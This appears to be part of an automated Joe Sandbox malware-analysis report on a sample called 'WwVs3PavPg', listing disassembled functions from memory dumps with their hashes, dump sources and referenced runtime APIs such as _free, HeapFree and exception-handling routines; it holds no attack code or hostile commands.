Opcode ID: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
Instruction ID: e80ba316238a52440995120652ccb2ba54186a16ce09c0288fdc6cfb70fcf59f
Opcode Fuzzy Hash: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
Instruction Fuzzy Hash: A0F13071E00219DFDF14CFA9D9806ADF7B1FF88324F2582A9D919AB344D731A941DB90

Function 04CF7CAA Relevance: 3.0, APIs: 1, Instructions: 1451COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 04CF7E25

Memory Dump Source

Source File: 00000000.00000003.2562228474.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4ce0000_WwVs3PavPg.jbxd

Similarity

API ID: __floor_pentium4
String ID:
API String ID: 4168288129-0
Opcode ID: 74712b48cc111f858d1a31e9ba76b8487e7a66425b713155efa2ae010c3ee8cc
Instruction ID: 3f6a67a305f66c5e7a4f14eedf4bc49c5343a177f11854dd6e9b10dc1c656e69
Opcode Fuzzy Hash: 74712b48cc111f858d1a31e9ba76b8487e7a66425b713155efa2ae010c3ee8cc
Instruction Fuzzy Hash: 1DC25B71E046288FDBA4DE29DD407E9B3B6EB48314F1441EADA0DE7240E778BE858F50

Function 04B53F4D Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04B53F48,?,?,00000008,?,?,04B5AB25,00000000), ref: 04B5417A

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
Instruction ID: 851bf4821145136d6815e672a2d621058b53c36e9e3f86bff6807aee8922e64a
Opcode Fuzzy Hash: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
Instruction Fuzzy Hash: 84B13F35610605DFDB15CF28C486B65BBE0FF45365F298698E899CF2B2C336E992CB40

Function 04B55F6E Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 553476085e68fa2a4c4149bcaaf72fd4b88f27a4c7c5ffc38eb151c09f90a700
Instruction ID: 2a02ed98e1fb0d2dcd136e8a3c24fc4c13b555c0caf67f709e2798379d18ada7
Opcode Fuzzy Hash: 553476085e68fa2a4c4149bcaaf72fd4b88f27a4c7c5ffc38eb151c09f90a700
Instruction Fuzzy Hash: 4B41A2B5804218AFDF20DF79CC88BAAFBB8EB45304F5442D9E85DD3210DA35AE858F50

Function 04B49BB0 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00409955,04B497B6), ref: 04B49BB5

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
Instruction ID: 160f56f175047b98bcb04f76aad41df29ef0812fdf3d1f646e40cac976d24dbb
Opcode Fuzzy Hash: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
Instruction Fuzzy Hash:

Function 04B4D644 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 04B4D7C0

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
Instruction ID: b9f3cf54a43b37b6f63110615f6ebe7ae02d2151f078c9cebda4c17c6b13ec97
Opcode Fuzzy Hash: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
Instruction Fuzzy Hash: 05515B7070064866EF799E6C88D47BE77EEDBC2308F0409DED48ADB281E625F944B752

Function 04B4D876 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 04B4D9F2

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
Instruction ID: 27f77c7acea2fc84f8a590b6e4e10ead9a2a83a80aada22a30ccf30e84eacb9e
Opcode Fuzzy Hash: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
Instruction Fuzzy Hash: 4D516C30704648A6EF389EAC88947BE679DEBD2708F0805DED482D72C1D661F946F352

Function 04CEC7DD Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 04CEC959

Memory Dump Source

Source File: 00000000.00000003.2562228474.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4ce0000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
Instruction ID: 1b20faf3ed2e5a3898006549f2bdd42645f964e378022ed5f9256f9bdd23f1cc
Opcode Fuzzy Hash: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
Instruction Fuzzy Hash: 8B5148716006895AFB3C9E2F86A97BE679B9F02304F080419D587D7281EB15FB47D352

Function 00AA4D67 Relevance: 1.4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

Strings

U_, xrefs: 00AA4DE4

Memory Dump Source

Source File: 00000000.00000002.3069516453.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A9F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a9f000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: U_
API String ID: 0-1441391406
Opcode ID: 6102b80af578b132808d37dbf5b15e7a084f9499db07bf1c484e013e543d0f1e
Instruction ID: b6d6d3a209ac98de9fbb4fbf594a68f1c3887996ab9c613c9269f91469a5a2e4
Opcode Fuzzy Hash: 6102b80af578b132808d37dbf5b15e7a084f9499db07bf1c484e013e543d0f1e
Instruction Fuzzy Hash: D751D2B250C310DFD3506E28DC8467AB7F4EBAD714F36492EE6C287680E7B51851A693

Function 04CF37F9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2562228474.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4ce0000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
Instruction ID: 98ac959fbcbf31f9aa391364da723e162a93da40453b3f395bdb6a7f0ce9ff37
Opcode Fuzzy Hash: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
Instruction Fuzzy Hash: 75322131E28F414DD7639634CC22336A299AFB73C5F95D737E81AB5EA6EB28D1834104

Function 04CE8DB3 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2562228474.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4ce0000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 752c4a2c8d500711185399bf2f6f55f818018c6fd5b69fec1d7075e323bfd424
Instruction ID: b9d8271b3f9c33d4557c4a4576e3425dfb6988ab9ea1f00b6dd8598141c681a7
Opcode Fuzzy Hash: 752c4a2c8d500711185399bf2f6f55f818018c6fd5b69fec1d7075e323bfd424
Instruction Fuzzy Hash: 3151BCB1E103058FEB25DF5AD9817AABBF2FB48314F54852AC801EB354D339AA11CB65

Function 04B5A779 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
Instruction ID: 53a9b4596741b4d703b3dee2c66b20d577f2960826688a38eeab8e35c5903ed5
Opcode Fuzzy Hash: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
Instruction Fuzzy Hash: 2321B373F205394B7B0CC57E8C522BDB6E1C78C601745823AE8A6EA2C1D96CD917E2E4

Function 00A221A8 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3069516453.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a2000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6169ace2674b0d94a8d025fe8f05e34392edb85eea53b4ac36f66ec88b6eb44e
Instruction ID: 8dd5d370958c5f1e243dfc6fa6e914f36139b3bd2784636405e29ef710a24eff
Opcode Fuzzy Hash: 6169ace2674b0d94a8d025fe8f05e34392edb85eea53b4ac36f66ec88b6eb44e
Instruction Fuzzy Hash: 583114B251C200DFE745BF29D84667ABBE5EF98310F12482CE6D582250E73594908B97

Function 04B5A659 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
Instruction ID: e73887866517eae7714d013718d8a8bd1de4ec71e4a0f3fa3c223a6bd36a49e9
Opcode Fuzzy Hash: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
Instruction Fuzzy Hash: 3911A723F30C255B675C81698C1727AA1D2DBDC14030F433AD826E7284E894DE13D290

Function 04B4ABC7 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 7a73fe8d35e3d71c5c24f5c0b821b3dd9abe8ae56d6465770b908d97031b84e3
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: DC1108772C0151439695CB2DDDB41BAA796EBCD32072C46EAD0414F75AD122F544B600

Function 04CE9D60 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2562228474.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4ce0000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 26b9b63659b74d42d569804443eca3166b2110a897851afa81f8b7592a678c22
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 9A1104F72401A243D6048A2FC8F56FBE797EBC632172C426AD0428BB58E333F3559600

Function 04B40D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 293818218bedeef1481949536c6cc3e7b8a6b3c3ef9f58d5a142aa209fb16be8
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 8801A276A006148FDF21EF24CC04BAA33F5EFC6216F4548F5EA0A9B281E774B9459B90

Function 04B538D6 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
Instruction ID: 246488dfe49aa5c32b350fed1d045568dcfc0a17c0cb868f336d2f696df64edd
Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
Instruction Fuzzy Hash: 39E08C72911268EBCB25DB8CC945E8AF3FCEB44B80B114496BD01D3220C270EE00C7D0

Function 04B5744A Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 04B5748E

Part of subcall function 04B5714A: _free.LIBCMT ref: 04B57167
Part of subcall function 04B5714A: _free.LIBCMT ref: 04B57179
Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5718B
Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5719D
Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571AF
Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571C1
Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571D3
Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571E5
Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571F7
Part of subcall function 04B5714A: _free.LIBCMT ref: 04B57209
Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5721B
Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5722D
Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5723F

_free.LIBCMT ref: 04B57483

Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51

_free.LIBCMT ref: 04B574A5
_free.LIBCMT ref: 04B574BA
_free.LIBCMT ref: 04B574C5
_free.LIBCMT ref: 04B574E7
_free.LIBCMT ref: 04B574FA
_free.LIBCMT ref: 04B57508
_free.LIBCMT ref: 04B57513
_free.LIBCMT ref: 04B5754B
_free.LIBCMT ref: 04B57552
_free.LIBCMT ref: 04B5756F
_free.LIBCMT ref: 04B57587

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
Instruction ID: 14cb6ab2ab1a9437f4c82fe233bb491e545522ac7e1cbfa12bd6e5481a9237c1
Opcode Fuzzy Hash: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
Instruction Fuzzy Hash: 95316B31B00605AFEB25AE3DE844B5AF7E8EF00354F50489AE869D71B0DF74F8409B20

Function 04CF65E3 Relevance: 19.6, APIs: 13, Instructions: 113COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 04CF661C
___free_lconv_mon.LIBCMT ref: 04CF6627

Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF6300
Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF6312
Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF6324
Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF6336
Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF6348
Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF635A
Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF636C
Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF637E
Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF6390
Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF63A2
Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF63B4
Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF63C6
Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF63D8

_free.LIBCMT ref: 04CF663E
_free.LIBCMT ref: 04CF6653
_free.LIBCMT ref: 04CF665E
_free.LIBCMT ref: 04CF6680
_free.LIBCMT ref: 04CF6693
_free.LIBCMT ref: 04CF66A1
_free.LIBCMT ref: 04CF66AC
_free.LIBCMT ref: 04CF66E4
_free.LIBCMT ref: 04CF66EB
_free.LIBCMT ref: 04CF6708
_free.LIBCMT ref: 04CF6720

Memory Dump Source

Source File: 00000000.00000003.2562228474.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4ce0000_WwVs3PavPg.jbxd

Similarity

API ID: _free$___free_lconv_mon
String ID:
API String ID: 3658870901-0
Opcode ID: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
Instruction ID: b7e77e35eb60a52c49567081d144d294a1647fec1457516d92eb22022a24bd54
Opcode Fuzzy Hash: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
Instruction Fuzzy Hash: C8314B317006009FEBA1AE39DC44B5A77EAAF00714F14842AE295D7252DF7AFA51DB20

Function 04B4B342 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 04B4B43F
type_info::operator==.LIBVCRUNTIME ref: 04B4B461
___TypeMatch.LIBVCRUNTIME ref: 04B4B570
IsInExceptionSpec.LIBVCRUNTIME ref: 04B4B642
_UnwindNestedFrames.LIBCMT ref: 04B4B6C6
CallUnexpected.LIBVCRUNTIME ref: 04B4B6E1

Strings

csm, xrefs: 04B4B3EC
csm, xrefs: 04B4B37F
csm, xrefs: 04B4B498

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
Instruction ID: f958f8c1c06dd8ad2a3a2dda83ddbe627588a88ea3576b8e757bd005fb919053
Opcode Fuzzy Hash: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
Instruction Fuzzy Hash: 45B16C71C04209EFDF15DFA8C8809AEB7B5FF88314B14459AEA156B211D730FA51EFA1

Function 04CEA4DB Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMON

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 04CEA5D8
type_info::operator==.LIBVCRUNTIME ref: 04CEA5FA
___TypeMatch.LIBVCRUNTIME ref: 04CEA709
IsInExceptionSpec.LIBVCRUNTIME ref: 04CEA7DB
_UnwindNestedFrames.LIBCMT ref: 04CEA85F
CallUnexpected.LIBVCRUNTIME ref: 04CEA87A

Strings

csm, xrefs: 04CEA585
csm, xrefs: 04CEA631
csm, xrefs: 04CEA518

Memory Dump Source

Source File: 00000000.00000003.2562228474.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4ce0000_WwVs3PavPg.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
Instruction ID: f1706070d7e07c16339ef952349df60172e4e25346c463a27abe9f38e1578fb9
Opcode Fuzzy Hash: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
Instruction Fuzzy Hash: 8AB17C71800209EFDF29DFA6D9809BEBBB6BF04314B14815AE8156B211D732FA52DB91

Function 04B5134C Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 04B51362

Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51

_free.LIBCMT ref: 04B5136E
_free.LIBCMT ref: 04B51379
_free.LIBCMT ref: 04B51384
_free.LIBCMT ref: 04B5138F
_free.LIBCMT ref: 04B5139A
_free.LIBCMT ref: 04B513A5
_free.LIBCMT ref: 04B513B0
_free.LIBCMT ref: 04B513BB
_free.LIBCMT ref: 04B513C9

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
Instruction ID: 2a10a7805f43cdd66fb67693c0c57ce734796f275dd78e4ecda33884c6c57685
Opcode Fuzzy Hash: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
Instruction Fuzzy Hash: A821B87A90011CFFDB05EF99D880EDDBFB8BF08244B4051A6E9259B171DB31EA54DB80

Function 04CF04E5 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 04CF04FB
_free.LIBCMT ref: 04CF0507
_free.LIBCMT ref: 04CF0512
_free.LIBCMT ref: 04CF051D
_free.LIBCMT ref: 04CF0528
_free.LIBCMT ref: 04CF0533
_free.LIBCMT ref: 04CF053E
_free.LIBCMT ref: 04CF0549
_free.LIBCMT ref: 04CF0554
_free.LIBCMT ref: 04CF0562

Memory Dump Source

Source File: 00000000.00000003.2562228474.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4ce0000_WwVs3PavPg.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
Instruction ID: acaa041e7243b144c48e04bfb57c0b5a001fb5848c61560116689d056185857d
Opcode Fuzzy Hash: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
Instruction Fuzzy Hash: 9721AB76900108BFDB41EF95CC80DDE7BB9BF08644F01856AF6559B222DB36EA44DB80

Function 04B492EF Relevance: 12.1, APIs: 8, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(0042AF64,00000FA0,?,?,04B492CD), ref: 04B492FB
GetModuleHandleW.KERNEL32(0041DFB8,?,?,04B492CD), ref: 04B49306
GetModuleHandleW.KERNEL32(0041DFFC,?,?,04B492CD), ref: 04B49317
GetProcAddress.KERNEL32(00000000,0041E018), ref: 04B49329
GetProcAddress.KERNEL32(00000000,0041E034), ref: 04B49337
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04B492CD), ref: 04B4935A
RtlDeleteCriticalSection.NTDLL(0042AF64), ref: 04B49376
CloseHandle.KERNEL32(0042AF60,?,?,04B492CD), ref: 04B49386

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID:
API String ID: 2565136772-0
Opcode ID: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
Instruction ID: 096d5d5beab73883d0c31ded6276062fec5c07aa1a4af502f75caaa1d3304148
Opcode Fuzzy Hash: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
Instruction Fuzzy Hash: 0B01B5F1F40321ABD7202F74AD09B9B3BA8EBCDB11B594071FD05D21A4DBACD4019A6A

Function 04CE9FE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 04CEA017
___except_validate_context_record.LIBVCRUNTIME ref: 04CEA01F
_ValidateLocalCookies.LIBCMT ref: 04CEA0A8
__IsNonwritableInCurrentImage.LIBCMT ref: 04CEA0D3
_ValidateLocalCookies.LIBCMT ref: 04CEA128

Strings

csm, xrefs: 04CEA0BD

Memory Dump Source

Source File: 00000000.00000003.2562228474.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4ce0000_WwVs3PavPg.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
Instruction ID: 320d9273309d4f661b30fab8b9268647b8c7b7509f23bd977647be4226ea204a
Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
Instruction Fuzzy Hash: 7D41E534A00209EFCF10DF6AC884ABEBBB6AF45328F148055E815AB351D737BA15CB91

Function 04B572E9 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 04B572B1: _free.LIBCMT ref: 04B572D6

_free.LIBCMT ref: 04B57337

Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51

_free.LIBCMT ref: 04B57342
_free.LIBCMT ref: 04B5734D
_free.LIBCMT ref: 04B573A1
_free.LIBCMT ref: 04B573AC
_free.LIBCMT ref: 04B573B7
_free.LIBCMT ref: 04B573C2

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
